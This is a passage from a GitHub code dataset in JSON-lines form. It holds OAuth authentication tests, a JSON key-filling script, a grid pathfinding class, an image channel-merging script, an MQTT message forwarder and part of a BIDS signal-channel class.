requests_mock):\n \"\"\"Test that authentication is successful if a valid, non-cached token is provided.\"\"\"\n adviser = AdviserFactory(sso_email_user_id=EXAMPLE_SSO_EMAIL_USER_ID)\n requests_mock.post(STAFF_SSO_INTROSPECT_URL, json=_make_introspection_data())\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = view(request)\n assert request.user == adviser\n assert response.status_code == status.HTTP_200_OK\n assert response.data == {'content': 'introspection-test-view'}\n\n user_events = list(UserEvent.objects.all())\n assert len(user_events) == 1\n user_event = user_events[0]\n assert user_event.adviser == adviser\n assert user_event.type == UserEventType.OAUTH_TOKEN_INTROSPECTION\n assert user_event.api_url_path == '/test-path'\n\n def test_authenticates_if_token_is_cached(self, api_request_factory, requests_mock):\n \"\"\"Test that authentication is successful if a valid, cached token is provided.\"\"\"\n adviser = AdviserFactory(sso_email_user_id=EXAMPLE_SSO_EMAIL_USER_ID)\n cached_data = {\n 'email': 'email@example.test',\n 'sso_email_user_id': EXAMPLE_SSO_EMAIL_USER_ID,\n }\n cache.set('access_token:token', cached_data)\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = view(request)\n assert not requests_mock.called\n assert request.user == adviser\n assert response.status_code == status.HTTP_200_OK\n assert response.data == {'content': 'introspection-test-view'}\n\n assert not UserEvent.objects.exists()\n\n def test_caches_token_with_timeout_on_introspection(self, api_request_factory, requests_mock):\n \"\"\"Test that after introspection, token data is cached with a timeout.\"\"\"\n AdviserFactory(sso_email_user_id=EXAMPLE_SSO_EMAIL_USER_ID)\n introspection_data = _make_introspection_data()\n requests_mock.post(STAFF_SSO_INTROSPECT_URL, json=introspection_data)\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = view(request)\n assert response.status_code == status.HTTP_200_OK\n\n # Check that the returned token data is cached\n assert cache.get('access_token:token') == {\n 'email': introspection_data['username'],\n 'sso_email_user_id': introspection_data['email_user_id'],\n }\n\n caching_period = settings.STAFF_SSO_USER_TOKEN_CACHING_PERIOD\n post_expiry_time = FROZEN_DATETIME + timedelta(seconds=caching_period)\n\n # Check that the cached token data expires after the caching period\n with freeze_time(post_expiry_time):\n assert not cache.get('access_token:token')\n\n def test_authentication_fails_if_user_is_inactive(self, api_request_factory, requests_mock):\n \"\"\"Test that authentication fails when there is a matching but inactive user.\"\"\"\n AdviserFactory(sso_email_user_id=EXAMPLE_SSO_EMAIL_USER_ID, is_active=False)\n requests_mock.post(STAFF_SSO_INTROSPECT_URL, json=_make_introspection_data())\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = view(request)\n\n assert not request.user\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n assert response.data == {'detail': 'Invalid authentication credentials.'}\n\n def test_authentication_fails_if_no_matching_user(self, api_request_factory, requests_mock):\n \"\"\"Test that authentication fails when there is no matching adviser in Data Hub.\"\"\"\n # Create an unrelated user that should not be returned\n AdviserFactory(email='unrelated@email.test', sso_email_user_id='unrelated@id.test')\n requests_mock.post(\n STAFF_SSO_INTROSPECT_URL,\n json=_make_introspection_data(username='email@email.test'),\n )\n\n request = api_request_factory.get('/test-path', HTTP_AUTHORIZATION='Bearer token')\n response = view(request)\n\n assert not request.user\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n assert response.data == {'detail': 'Invalid authentication credentials.'}\n","repo_name":"uktrade/data-hub-api","sub_path":"datahub/oauth/test/test_auth.py","file_name":"test_auth.py","file_ext":"py","file_size_in_byte":9068,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"81"} +{"seq_id":"32959891524","text":"import json\n\nwith open('people.json') as ifd:\n dicts = list(json.load(ifd))\n\nkeys = set()\nfor d in dicts:\n keys.update(d.keys())\n\nfor d in dicts:\n for k in keys:\n d.setdefault(k, None)\n\nwith open('updated_people.json', 'w', encoding='utf-8') as ofd:\n json.dump(dicts, ofd, indent=3)\n","repo_name":"albert2126/StepikPythonProfs","sub_path":"Part04/restore_keys.py","file_name":"restore_keys.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40454481869","text":"from typing import List, Callable\nfrom heapq import heapify, heappush, heappop\nfrom pathfinder.algorithms.Nodes import Node, PrioritizedItem\n\nimport random\n\n\nclass Graph:\n # TODO remove for loop from self.nodes initilization and mix it with the second for loop\n\n def __init__(self, grid: List[List]) -> None:\n \"\"\"\n precondition: grid will contain a uniform amount of nodes per row\n \"\"\"\n self.nodes = [[Node() for column in range(len(grid[1]))]\n for row in range(len(grid))]\n\n self.v = 0\n self.edges = {}\n\n self.visited = []\n self.path = []\n self.distances = {}\n for row in range(len(grid)):\n for col in range(len(grid[row])):\n self.v += 1 # number of vertices\n node = self.nodes[row][col]\n node.value = grid[row][col]\n node.x = col\n node.y = row\n self.edges[node] = []\n weight = 1\n if not node.is_wall():\n\n if col < len(grid[row])-1:\n neighbor = self.nodes[row][col+1]\n neighbor.value = grid[row][col+1]\n neighbor.x = col+1\n neighbor.y = row\n self.add_edge(node, neighbor, weight)\n\n if col > 0:\n neighbor = self.nodes[row][col-1]\n neighbor.value = grid[row][col-1]\n neighbor.x = col-1\n neighbor.y = row\n self.add_edge(node, neighbor, weight)\n\n if row < len(grid)-1:\n neighbor = self.nodes[row+1][col]\n neighbor.value = grid[row+1][col]\n neighbor.x = col\n neighbor.y = row+1\n self.add_edge(node, neighbor, weight)\n\n if row > 0:\n neighbor = self.nodes[row-1][col]\n neighbor.value = grid[row-1][col]\n neighbor.x = col\n neighbor.y = row-1\n self.add_edge(node, neighbor, weight)\n\n def add_edge(self, u: Node, v: Node, weight: int) -> None:\n\n if not v.is_wall():\n if u not in self.edges:\n self.edges[u] = [(v, weight)]\n else:\n self.edges[u].append((v, weight))\n\n if v not in self.edges:\n self.edges[v] = [(u, weight)]\n else:\n self.edges[v].append((u, weight))\n\n # if not v.is_wall():\n # if u not in self.edges:\n # self.edges[u] = {v: weight}\n # else:\n # self.edges[u][v] = weight\n # if v not in self.edges:\n # self.edges[v] = {u: weight}\n # else:\n # self.edges[v][u] = weight\n\n @ staticmethod\n def heuristic(curr: Node, goal: Node, D: int = 1) -> int:\n \"\"\"\n Returns an admissible heuristic in manhattan distance \n \"\"\"\n return D*(abs(curr.x-goal.x) + abs(curr.y - goal.y))\n\n @ staticmethod\n def dijkstra_f_cost(g: int, h: int) -> int:\n \"\"\"\n Returns F cost when heuristic is 0\n \"\"\"\n f = g\n return f\n\n @ staticmethod\n def greedy_f_cost(g: int, h: int) -> int:\n \"\"\"\n Returns f cost when g cost is 0\n \"\"\"\n f = h\n return f\n\n @ staticmethod\n def astar_f_cost(g: int, h: int) -> int:\n \"\"\"\n Returns f cost with an admissible heuristic combined with g cost\n \"\"\"\n f = g+h\n return f\n\n def pathfinder(self, start_vertex: Node, end_vertex: Node, f: Callable[[int, int], int]) -> List:\n distances = {self.nodes[i][j]: float('inf') for i in range(len(self.nodes))\n for j in range(len(self.nodes[i]))}\n distances[start_vertex] = 0 # f cost\n pq = []\n # open_list = []\n heappush(pq, PrioritizedItem(0, start_vertex))\n # open_list.append(start_vertex)\n while pq:\n curr_vertex = heappop(pq).item\n # open_list.remove(curr_vertex)\n self.visited.append(curr_vertex)\n if curr_vertex == end_vertex:\n break\n\n else:\n\n self.visited.append(curr_vertex)\n\n for neighbor in self.edges[curr_vertex]:\n weight, neighbor = neighbor[1], neighbor[0]\n # weight = self.edges[curr_vertex][neighbor[1]]\n # neighbor = neighbor[0]\n\n g_cost = distances[curr_vertex] + weight\n old_g_cost = distances[neighbor]\n\n heuristic = self.heuristic(curr_vertex, end_vertex, weight)\n tie_breaker = 1/self.v\n heuristic *= (1.0 - tie_breaker)\n f_cost = f(g_cost, heuristic)\n\n # if old_g_cost < g_cost and neighbor in self.visited:\n # index = self.visited.index(neighbor)\n # self.visited[index] = curr_vertex\n # distances[neighbor] = g_cost\n # neighbor.set_prev(curr_vertex)\n if neighbor in self.visited:\n continue\n for node in pq:\n node = node.item\n if neighbor.x == node.x and neighbor.y == node.y:\n if old_g_cost != distances[node]:\n # print(node, old_g_cost, distances[node])\n continue\n else:\n if g_cost < old_g_cost:\n heappush(pq, PrioritizedItem(f_cost, neighbor))\n distances[neighbor] = g_cost\n neighbor.set_prev(curr_vertex)\n\n return self.visited\n\n def dijkstra(self, start_vertex: Node, end_vertex: Node) -> List:\n self.pathfinder(start_vertex, end_vertex, self.dijkstra_f_cost)\n return self.visited\n \"\"\"\n # TODO handle case where there is no start and end ndoe, or case where they overlap each other\n\n distances = {self.nodes[i][j]: float('inf') for i in range(len(self.nodes))\n for j in range(len(self.nodes[i]))}\n distances[start_vertex] = 0\n # print(distances)\n pq = []\n heappush(pq, PrioritizedItem(0, start_vertex))\n while pq:\n\n current_vertex = heappop(pq).item\n self.visited.append(current_vertex)\n for neighbor in self.edges[current_vertex]:\n weight = self.edges[current_vertex][neighbor]\n if neighbor not in self.visited:\n\n old_cost = distances[neighbor]\n new_cost = distances[current_vertex] + weight\n if new_cost < old_cost:\n heappush(pq, PrioritizedItem(new_cost, neighbor))\n distances[neighbor] = new_cost\n neighbor.set_prev(current_vertex)\n self.distances = distances\n return self.visited\n \"\"\"\n\n def a_star(self, start_vertex: Node, end_vertex: Node) -> List:\n self.pathfinder(start_vertex, end_vertex, self.astar_f_cost)\n return self.visited\n\n def greedy_bfs(self, start_vertex: Node, end_vertex: Node) -> List:\n self.pathfinder(start_vertex, end_vertex, self.greedy_f_cost)\n return self.visited\n\n def shortest(self, node: Node) -> None:\n if node.previous:\n self.path.append(node.previous)\n self.shortest(node.previous)\n\n return\n\n def get_paths(self, target: Node) -> List:\n self.path.append(target)\n self.shortest(target)\n return self.path\n\n def dispatch(self, algo: str, nodes: List[Node]) -> List:\n dispatcher = {\n 'astar': lambda nodes: self.a_star(nodes[0], nodes[1]),\n 'dijkstra': lambda nodes: self.dijkstra(nodes[0], nodes[1]),\n 'greedyBfs': lambda nodes: self.greedy_bfs(nodes[0], nodes[1]),\n }\n return dispatcher[algo](nodes)\n\n\nif __name__ == \"__main__\":\n\n ...\n","repo_name":"galaddirie/pathfinder_app","sub_path":"pathfinder/algorithms/PathFinder.py","file_name":"PathFinder.py","file_ext":"py","file_size_in_byte":8400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32266412214","text":"#import Image from PIL\nfrom PIL import Image\n#Load Images into objects\nbase_img=Image.open(\"base.jpeg\")\nimg_filter=Image.open(\"download.jpg\")\n#set 0/p image size\nsize=(780,760)\n#resize all images to o/p size\nbase_img=base_img.resize(size)\nimg_filter=img_filter.resize(size)\nr,g,b=base_img.split()\nR,G,B=img_filter.split()\nim=Image.merge(\"RGB\",(R,g,B))\nim=Image.merge(\"RGB\",(r,Gg,b))\n#im.save('1_merged.jpg')\n","repo_name":"poojak-shetty/insta-filter","sub_path":"instafilters.py","file_name":"instafilters.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73060372425","text":"import paho.mqtt.client as mqtt\n\nMQTT_HOST=\"172.20.0.2\"\nMQTT_PORT=1883\nMQTT_TOPIC=\"hw3\"\n\nCLOUD_MQTT_HOST=\"169.61.16.130\"\nCLOUD_MQTT_PORT=1883\nCLOUD_MQTT_TOPIC=\"facedetection\"\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected to jetson\")\n\ndef on_connect_cloud(client, userdata, flags, rc):\n print(\"Connected to cloud\")\n\ndef on_message(client, userdata, msg):\n print(\"on message received\")\n cloudmqttclient.publish(CLOUD_MQTT_TOPIC,payload=msg.payload,qos=2,retain=False)\n\ncloudmqttclient = mqtt.Client()\ncloudmqttclient.connect(CLOUD_MQTT_HOST,CLOUD_MQTT_PORT,60)\ncloudmqttclient.on_connect = on_connect_cloud \n\nmqttclient = mqtt.Client()\nmqttclient.on_connect = on_connect \nmqttclient.on_message = on_message \n\nmqttclient.connect(MQTT_HOST,MQTT_PORT,60)\nmqttclient.subscribe(MQTT_TOPIC, qos=2)\n\nmqttclient.loop_forever() # Start networking daemon\n","repo_name":"Divyaraaga/w251-DeepLearning","sub_path":"hw3/jetson_forwarder/forwarder.py","file_name":"forwarder.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"10480354958","text":"import math\nfrom datetime import datetime\nfrom datetime import timedelta\nimport logging\n\nfrom DataStructure.BIDS.BIDS import BIDSfieldLibrary\n\nLogger = logging.getLogger(__name__)\n\n\ndef ReplaceInField(In_string, Void=\"\", ToReplace=None):\n \"\"\"Find and replace strings in ToReplace tuple \n in input string. If input string is empty, returns \n Void string\"\"\"\n\n if not isinstance(In_string, str) or not isinstance(Void, str):\n raise TypeError(\"ReplaceInField: In_string and Void must be a string\")\n\n if ToReplace is not None:\n if not isinstance(ToReplace, tuple)\\\n or len(ToReplace) != 2\\\n or not isinstance(ToReplace[0], str)\\\n or not isinstance(ToReplace[1], str):\n raise TypeError(\"ReplaceInField: \"\n \"ToReplace must be either None or (str,str)\")\n\n if In_string == \"\" :\n return Void\n\n if ToReplace is not None:\n return In_string.replace(ToReplace[0], ToReplace[1])\n return In_string\n\n\nclass GenChannel(BIDSfieldLibrary):\n \"\"\"An intendent virtual class serving as parent to other,\n format specific channel classes.\"\"\"\n\n __base_slots__ = [\n \"_scale\", \"_offset\",\n \"_unit\", \"_magnitude\",\n \"_physMin\", \"_physMax\",\n \"_digMin\", \"_digMax\",\n \"_seqStartTime\",\n \"_seqSize\",\n \"_frequency\",\n \"_name\",\n \"_type\",\n \"_description\",\n \"_reference\",\n \"_id\",\n\n \"_startTime\",\n \"_frMultiplier\",\n \"_baseChannel\",\n \"BIDSvalues\"]\n\n BIDSfields = BIDSfieldLibrary()\n\n __slots__ = __base_slots__\n\n def __copy__(self, source):\n if not isinstance(source, GenChannel):\n raise TypeError(\": Source object must be a daughter of \"\n + self.__class__.__name__)\n for f in self.__base_slots__:\n setattr(self, f, getattr(source, f))\n self._baseChannel = source\n\n \"Min and max values for an signed short integer\"\n _MAXSHORT = 32767\n _MINSHORT = -32768\n\n \"\"\"Dictionary of standard SI prefixes, as defined in BIDS\"\"\"\n _SIprefixes = {24:'Y', 21:'Z', 18:'E', 15:'P', 12:'T', 9:'G',\n 6:'M', 3:'k', 2:'h', 1:'da', 0:'', -1:'d', \n -2:'c', -3:'m', -6:'µ', -9:'n', -12:'p', \n -15:'f', -18:'a', -21:'z', -24:'y'}\n\n \"\"\"Inverted dictionary of standard SI prefixes, as defined in BIDS\"\"\"\n _SIorders = {'Y':24, 'Z':21, 'E':18, 'P':15, 'T':12,'G':9, \n 'M': 6,'k': 3,'h': 2,'da': 1, 0:'', 'd':-1, \n 'c':-2, 'm':-3, 'µ':-6, 'n':-9, 'p':-12, \n 'f':-15, 'a':-18, 'z':21, 'y':-24}\n\n _BIDStypes = [\"AUDIO\", \"EEG\", \"HEOG\", \"VEOG\", \"EOG\", \"ECG\", \"EKG\",\n \"EMG\", \"EYEGAZE\", \"GSR\", \"PUPIL\", \"REF\", \"RESP\", \n \"SYSCLOCK\", \"TEMP\", \"TRIG\", \"MISC\"]\n\n def __init__(self):\n super(GenChannel, self).__init__()\n self._scale = 1.\n self._offset = 0.\n self._unit = \"\"\n self._magnitude = 0\n self._physMin = self._MINSHORT\n self._physMax = self._MAXSHORT\n self._digMin = self._MINSHORT\n self._digMax = self._MAXSHORT\n\n self._frequency = 1\n self._name = \"\"\n self._type = \"\"\n self._description = \"\"\n self._reference = \"\"\n\n self._seqStartTime = []\n self._seqSize = []\n\n self._startTime = datetime.min\n self._frMultiplier = 1\n\n self._baseChannel = self\n self._id = -1\n self.BIDSvalues = dict()\n\n def GetId(self): return self._id\n\n def SetId(self, Id): self._id = Id\n\n def GetScale(self): return self._scale\n\n def GetOffset(self): return self._offset\n\n def GetPhysMax(self): return self._physMax\n\n def GetPhysMin(self): return self._physMin\n\n def GetDigMax(self): return self._digMax\n\n def GetDigMin(self): return self._digMin\n\n def SetScale(self, scale, offset=0):\n \"\"\"Defining new scale and offset. Physical minimum and maximum\n are recalculated accordingly.\"\"\"\n if not (isinstance(scale, int) or isinstance(scale, float)):\n raise TypeError(\"Scale must be integer or float value\")\n if not (isinstance(offset, int) or isinstance(offset, float)):\n raise TypeError(\"Offset must be integer or float value\")\n\n self._scale = scale\n self._offset = offset\n self._physMin = self._fromRaw(self._digMin)\n self._physMax = self._fromRaw(self._digMax)\n\n def SetPhysicalRange(self, minimum, maximum):\n \"\"\"Defining new physical extrema.\n The scale and offset are recalculated.\"\"\"\n\n if not (isinstance(minimum, int) or isinstance(minimum, float)):\n raise TypeError(\"Physical mimimum must be \"\n \"integer or float value\")\n\n if not (isinstance(maximum, int) or isinstance(maximum, float)):\n raise TypeError(\"Physical maximum must be \"\n \"integer or float value\")\n\n if minimum >= maximum:\n raise ValueError(\"Physical minimum must be \"\n \"lower than maximum\")\n self._physMin = minimum\n self._physMax = maximum\n self._calculateScale()\n\n def SetDigitalRange(self, minimum, maximum):\n \"\"\"Defining new digital extrema.\n The scale and offset are recalculated.\"\"\"\n if not (isinstance(minimum, int)):\n raise TypeError(\"Digital mimimum must be integer value\")\n if not (isinstance(maximum, int)):\n raise TypeError(\"Digital maximum must be integer value\")\n if minimum >= maximum:\n raise ValueError(\"Digital minimum must be lower than maximum\")\n if minimum < self._MINSHORT:\n raise ValueError(\"Digital minimum must be \"\n \"greater than minimum short value\")\n if maximum > self._MAXSHORT:\n raise ValueError(\"Digital maximum must be \"\n \"greater than maximum short value\")\n\n self._digMin = minimum\n self._digMax = maximum\n self._calculateScale()\n\n def _calculateScale(self):\n \"\"\"Recalculates scale and offset \n according to physical and digital extrema.\"\"\"\n self._scale = (self._physMax - self._physMin)\\\n / (self._digMax - self._digMin)\n self._offset = self._physMin - self._scale * self._digMin\n\n def FromRaw(self, value):\n \"\"\"Transform raw short integer value to the measured one.\n Input must be integer and in Digital range.\"\"\"\n if not (isinstance(value, int)):\n raise TypeError(self.__class__ + \": Value must be an integer\")\n if value > self._digMax or value < self._digMin:\n raise Exception(self.__class__\n + \": value \" + str(value) + \" out of the range [\"\n + str(self._digMin) + \", \"\n + str(self._digMax) + \"]\")\n return self._fromRaw(value)\n\n def _fromRaw(self, value):\n \"\"\"Transform raw short integer value to the measured one.\n No checks in value performed.\"\"\"\n return value * self._scale + self._offset\n\n def ToRaw(self, value):\n \"\"\"Transform measured value to raw short integer.\n Input must be float and in Physical range.\"\"\"\n if not (isinstance(value, int) or isinstance(value, float)):\n raise TypeError(self.__class__\n + \": Value must be an integer or float\")\n if value > self._physMax or value < self._physMin:\n raise Exception(self.__class__\n + \": value \" + str(value) + \" out of the range [\"\n + str(self._physMin) + \", \"\n + str(self._physMax) + \"]\")\n return self._toRaw(value)\n\n def _toRaw(self, value):\n \"\"\"Transform measured value to raw short integer one.\n No checks in value performed.\"\"\"\n return int((value - self._offset) / self._scale + 0.5) \n\n def SetName(self, name):\n if not (isinstance(name, str)):\n raise TypeError(self.__class__\n + \": Name must be a string\")\n self._name = name\n\n def GetName(self, Void=\"\", ToReplace=None):\n return ReplaceInField(self._name, Void, ToReplace)\n\n def SetType(self, name):\n if not (isinstance(name, str)):\n raise TypeError(self.__class__ + \": Type must be a string\")\n self._type = name\n\n def GetType(self, Void=\"\", ToReplace=None):\n return ReplaceInField(self._type, Void, ToReplace)\n\n def BidsifyType(self):\n \"\"\"Replace the type of channel by a BIDS supported type.\n Matching is performed by searching string from _BIDStypes\n in original type. If not found, a MISC type is attributed.\n \"\"\"\n if self._type == \"EKG\":\n self._type = \"ECG\"\n if self._type in self._BIDStypes:\n # Type already BIDS complient\n return\n\n bids_type = \"MISC\"\n for t in self._BIDStypes:\n if t in self._type:\n bids_type = t\n break\n if bids_type == \"EKG\":\n bids_type = \"ECG\"\n Logger.debug(\"{}:Changing type from {} to {}\".format(\n self._name, self._type, t))\n self._type = t\n\n def SetDescription(self, name):\n if not (isinstance(name, str)):\n raise TypeError(self.__class__ + \" : Description must be a string\")\n self._description = name\n\n def GetDescription(self, Void=\"\", ToReplace=None):\n return ReplaceInField(self._description, Void, ToReplace)\n\n def SetReference(self, name):\n if not (isinstance(name, str)):\n raise TypeError(self.__class__ + \": Reference must be a string\")\n self._reference = name\n\n def GetReference(self, Void=\"\", ToReplace=None):\n return ReplaceInField(self._reference, Void, ToReplace)\n\n def SetUnit(self, unit):\n if not (isinstance(unit, str)):\n raise TypeError(self.__class__ + \": Unit must be a string\")\n self._unit = unit\n\n def GetUnit(self, wMagnitude=True, Void=\"\"):\n if wMagnitude:\n if self._unit == \"\":\n if self._magnitude == 0:\n return Void\n else:\n return \"x10^\" + str(self._magnitude)\n\n if self._magnitude in self._SIprefixes:\n return self._SIprefixes[self._magnitude] + self._unit\n else:\n magn = min(self._SIprefixes.keys(),\n key=lambda k: abs(k - self._magnitude))\n return \"x10^\" + str(self._magnitude - magn)\\\n + \" \" + self._SIprefixes[magn] + self._unit\n else:\n if self._unit == \"\": return Void\n else: return self._unit \n\n def SetMagnitude(self, magn):\n \"\"\"Setting the magnitude to the measured value.\n This affects scale, offset and physical range.\"\"\"\n if not (isinstance(magn, int)):\n raise TypeError(self.__class__ + \": magnitude must be an integer\")\n self._scale /= 10**(magn + self._magnitude)\n self._offset /= 10**(magn + self._magnitude)\n self._physMin /= 10**(magn + self._magnitude)\n self._physMax /= 10**(magn + self._magnitude)\n self._magnitude = magn\n\n def OptimizeMagnitude(self):\n magn = math.log10(self._scale) + self._magnitude\n if magn < 0 : \n magn = int(math.floor(magn) / 3 - 0.5 + 1) * 3\n else :\n magn = int(math.ceil(magn) / 3 + 0.5 - 1) * 3\n self.SetMagnitude(magn)\n\n def GetFrequency(self):\n return self._frequency\n\n def SetFrequency(self, freq):\n if not isinstance(freq, int):\n raise TypeError(\"Frequency must be an integer representing Hz\")\n self._frequency = freq\n\n def GetMagnitude(self):\n return self._magnitude \n\n \"\"\"Functions related to the sequences, i.e.\n unenturupted periods of data-taking.\"\"\"\n\n def GetNsequences(self):\n \"\"\"Returns number of interupted sequences\"\"\"\n return len(self._seqStartTime)\n\n def GetSequenceStart(self, seq=0):\n \"\"\"Returns the start time of the ith sequence\"\"\"\n return self._seqStartTime[seq]\n\n def GetSequenceEnd(self, seq=0):\n return self._seqStartTime[seq]\\\n + timedelta(seconds=self.GetSequenceDuration(seq))\n\n def GetSequenceSize(self, seq=0):\n \"\"\"Returns the size (number of measurements) in given sequence\"\"\"\n return self._seqSize[seq]\n\n def GetSequenceDuration(self, seq=0):\n \"\"\"Returns the time span (in seconds) of given sequence\"\"\"\n return self._seqSize[seq] / self._frequency\n\n def SetStartTime(self, start):\n if not isinstance(start, datetime):\n raise TypeError(\"StartTime must be a datetime object\")\n self._startTime = start\n\n def GetStartTime(self):\n return self._startTime\n\n def SetFrequencyMultiplyer(self, frMult):\n if not isinstance(frMult,int):\n raise TypeError(\"Frequency multiplyer must be a positif integer\")\n if frMult <= 0:\n raise ValueError(\"Frequency multiplyer must be positif\")\n self._frMultiplier = frMult\n\n def GetFrequencyMultiplyer(self):\n return self._frMultiplier\n\n \"\"\"\n Functions related to the index of a partiular data points.\n Each point can be indexed by global index, common to all channels,\n given the common time origin, and common frequency, or by local index\n defined its position in its sequence.\n \"\"\"\n def GetGlobalIndex(self, point, sequence,\n StartTime=None, freqMultiplier=None):\n \"\"\"\n Converts local index from a sequence to a global one\n Do not check if given point is actually exists in sequence\n\n It uses round to get the index if StartTime is not synchronized\n with sequence time\n\n Parameters\n ----------\n point : int\n local index of data point in sequence\n sequence : int\n index of a sequence\n StartTime : datetime, optional\n the time from which the global index should be calculated\n if not defined, channel's start time is used\n freqMultiplier : int, optional\n frequency multiplier used to convert from local channel\n frequency to a common one. If not set, channel defined\n multiplier is used\n\n Returns\n -------\n int\n the global index\n\n Raises\n ------\n IndexError\n if sequence is out of range\n \"\"\"\n if StartTime is None:\n StartTime = self._startTime\n if freqMultiplier is None:\n freqMultiplier = self._frMultiplier\n if not isinstance(StartTime, datetime):\n raise TypeError(\"StartTime must be datetime object\")\n if not (isinstance(freqMultiplier,int) or freqMultiplier > 0):\n raise TypeError(\"freqMultiplier must be a positive integer\") \n if not isinstance(sequence, int) or not isinstance(point, int):\n raise TypeError(\"sequence and point must be integer\")\n if sequence < 0 or sequence >= len(self._seqStartTime):\n raise IndexError(\"sequence (\" + str(sequence) \n + \")is out of the range\")\n\n time = self._getTime(point, self._seqStartTime[sequence], 1) \n index = (time - StartTime).total_seconds()\\\n / (self._frequency * freqMultiplier)\n return round(index)\n\n def GetLocalindex(self, point, StartTime=None, freqMultiplier=None):\n \"\"\"\n Converts global index to a local one. returns \n a tuple (index, sequence).\n If point happens before start of data, sequence will be -1\n If point outside of sequence size, index will be -1\n\n Parameters\n ----------\n point : int\n global index of data point\n StartTime : datetime, optional\n starting time for global index. If not set, the channel's\n defined will be used\n freqMultiplier : int, optional\n frequency multiplier for calculation of global frequency\n If not set, channel's defined one will be used\n\n Returns\n -------\n (int, int)\n the tuple (index, sequence) of corresponding local index\n \"\"\"\n if StartTime is None:\n StartTime = self._startTime\n if freqMultiplier is None:\n freqMultiplier = self._frMultiplier\n if not isinstance(point, int):\n raise TypeError(\"point must be int\")\n if not isinstance(StartTime, datetime):\n raise TypeError(\"StartTime must be datetime object\")\n if not (isinstance(freqMultiplier,int) or freqMultiplier > 0):\n raise TypeError(\"freqMultiplier must be a positive integer\") \n time = self._getTime(point, StartTime, freqMultiplier)\n return self._getLocalIndex(time)\n\n def GetTimeFromIndex(self, point, sequence=None, \n StartTime=None, freqMultiplier=None):\n \"\"\"\n Converts local or global index to a corresponding time.\n Parameters sequence and (Starttime, frqMultiplier) are\n mutually exclusive as they used to distinguish between\n local and global index\n\n Parameters\n ----------\n point : int\n index to data point\n sequence : int, optional\n index to a sequence. If set, index will be concidered \n as local\n StartTime : datetime, optional\n the start time for a global index. If not set and \n index is global, channel-defined start time will \n be used\n freqMultiplier : int, optional\n frequency multiplier used for calculating global frequency.\n If not set, channel-defined will be used\n\n Returns\n -------\n datetime\n time corresponding to current index\n\n Raises\n ------\n TypeError\n if passed parameters are of invalid type\n RuntimeError\n if passed parameters are incompatible\n IndexError\n if sequence index is invalid\n \"\"\"\n if sequence is not None:\n if StartTime is not None or freqMultiplier is not None:\n raise RuntimeError(\"parameters sequence and (StartTime, \"\n \"freqMultiplier) are mutually exclusive\")\n if StartTime is None:\n StartTime = self._startTime\n if freqMultiplier is None:\n freqMultiplier = self._frMultiplier\n\n if not isinstance(point, int):\n raise TypeError(\"point must be int\")\n if not isinstance(sequence, int):\n raise TypeError(\"sequence must be int\")\n if not isinstance(StartTime, datetime):\n raise TypeError(\"StartTime must be datetime\")\n if not isinstance(freqMultiplier, int):\n raise TypeError(\"freqMultiplier must be int\")\n\n if sequence is None:\n return self._getTime(point, StartTime, freqMultiplier)\n else:\n if sequence < 0 or sequence > self.GetNsequences():\n raise IndexError(\"sequence out of range\")\n return self._getTime(point, self._seqStartTime[sequence], 1)\n\n def GetLocalIndexFromTime(self, time):\n \"\"\"\n Converts time to local index. If time is before \n the first sequence, returned sequence is set to -1.\n If there no data point at given time, returned index\n will be set to -1\n\n Parameters\n ----------\n time : datetime\n\n Returns\n -------\n (int, int)\n a tuple (index, sequence)\n\n Raises\n ------\n TypeError\n if passed parameter is of invalid type\n \"\"\"\n if not isinstance(time, datetime):\n raise TypeError(\"time must be datetime object\")\n return self._getLocalIndex(time)\n\n def GetGlobalIndexFromTime(self, time, \n StartTime=None, freqMultiplier=None):\n \"\"\"\n Converts time to global index. \n\n Parameters\n ----------\n time : datetime\n\n Returns\n -------\n (int, int)\n a tuple (index, sequence)\n\n Raises\n ------\n TypeError\n if passed parameter is of invalid type\n \"\"\"\n if StartTime is None:\n StartTime = self._startTime\n if freqMultiplier is None:\n freqMultiplier = self._frMultiplier\n if not isinstance(time, datetime):\n raise TypeError(\"time must be datetime object\")\n if not isinstance(StartTime, datetime):\n raise TypeError(\"StartTime must be datetime\")\n if not isinstance(freqMultiplier, int):\n raise TypeError(\"freqMultiplier must be int\")\n dt = (time - StartTime).total_seconds()\n return round(dt * self._frequency * freqMultiplier)\n\n def GetValue(self, point, default=0, \n sequence=None, StartTime=None, \n raw=False):\n \"\"\"\n Retrieves value of a particular time point. If given hannel is \n a copy of an original channel, the values are retrieved from \n the original one. In such case the sequences and start times are\n also treated by original channel.\n\n This is virtual function, a particular implementation depends\n on daughter class.\n\n Parameters\n ----------\n point : int \n the index of the point to be retrieved\n If sequence is not given, a global index is used\n point : datetime\n the time of point to be retrieved\n point : timedelta\n the index of the point to be retrieved \n by time passed from beginning of sequence\n default : int, 0\n returned value if asked point not available\n e.g. not in sequence\n sequence : int, optional\n specifies the sequence in which data will be retrieved. \n Points outside given sequence will return default value.\n If pont parameter is given by time, sequence is ignored\n StartTime : datetime, optional\n if point is given by timedelta, specifies the reference time.\n If set to None, the channel-defined value is used.\n If sequence is specified, StartTime is ignored and \n the beginning of given sequence is used as reference\n raw : bool, False\n If set to true, the raw, unscaled value is retrieved\n\n Returns\n ---------\n float or int\n the value of required point\n\n Raises\n --------\n TypeError\n if given parameters are of wrong type\n NotImplementedError\n if class do not implements data retrieval in \n _getValue function\n \"\"\"\n # In case of copied channel, all sequences and times are\n # treated by original channel\n if self._baseChannel != self:\n return self._baseChannel.GetValue(point, default,\n sequence, StartTime, raw)\n\n if not 